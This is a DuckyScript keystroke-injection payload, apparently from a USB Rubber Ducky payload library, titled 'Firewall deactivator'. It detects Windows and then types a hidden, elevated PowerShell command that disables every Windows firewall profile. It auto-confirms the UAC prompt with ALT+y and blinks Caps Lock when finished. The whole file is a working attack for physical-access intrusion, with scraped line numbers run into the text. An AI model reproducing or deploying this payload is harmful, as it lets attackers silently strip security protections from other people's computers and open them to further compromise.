Path: blob/master/payloads/library/execution/Firewall_Deactivator/payload.txt
3018 views
REM Title: Firewall deactivator1REM Author: luu1762REM Description: Deactivate all firewalls in windows machine using hidden powershell3REM Target: Windows45EXTENSION PASSIVE_WINDOWS_DETECT6REM VERSION 1.17REM AUTHOR: Korben89REM_BLOCK DOCUMENTATION10Windows fully passive OS Detection and passive Detect Ready11Includes its own passive detect ready.12Does not require additional extensions.1314USAGE:15Extension runs inline (here)16Place at beginning of payload (besides ATTACKMODE) to act as dynamic17boot delay18$_OS will be set to WINDOWS or NOT_WINDOWS19See end of payload for usage within payload20END_REM2122REM CONFIGURATION:23DEFINE #MAX_WAIT 15024DEFINE #CHECK_INTERVAL 2025DEFINE #WINDOWS_HOST_REQUEST_COUNT 226DEFINE #NOT_WINDOWS 72728$_OS = #NOT_WINDOWS2930VAR $MAX_TRIES = #MAX_WAIT31WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))32DELAY #CHECK_INTERVAL33$MAX_TRIES = ($MAX_TRIES - 1)34END_WHILE35IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN36$_OS = WINDOWS37END_IF3839REM_BLOCK EXAMPLE USAGE AFTER EXTENSION40IF ($_OS == WINDOWS) THEN41STRING HELLO WINDOWS!42ELSE43STRING HELLO WORLD!44END_IF45END_REM46END_EXTENSION4748GUI r49DELAY 20050STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"51DELAY 80052ALT y53SAVE_HOST_KEYBOARD_LOCK_STATE54VAR $i = 055WHILE ( $i < 9 )56DELAY 15057CAPSLOCK58$i = ( $i + 1 )59END_WHILE60RESTORE_HOST_KEYBOARD_LOCK_STATE616263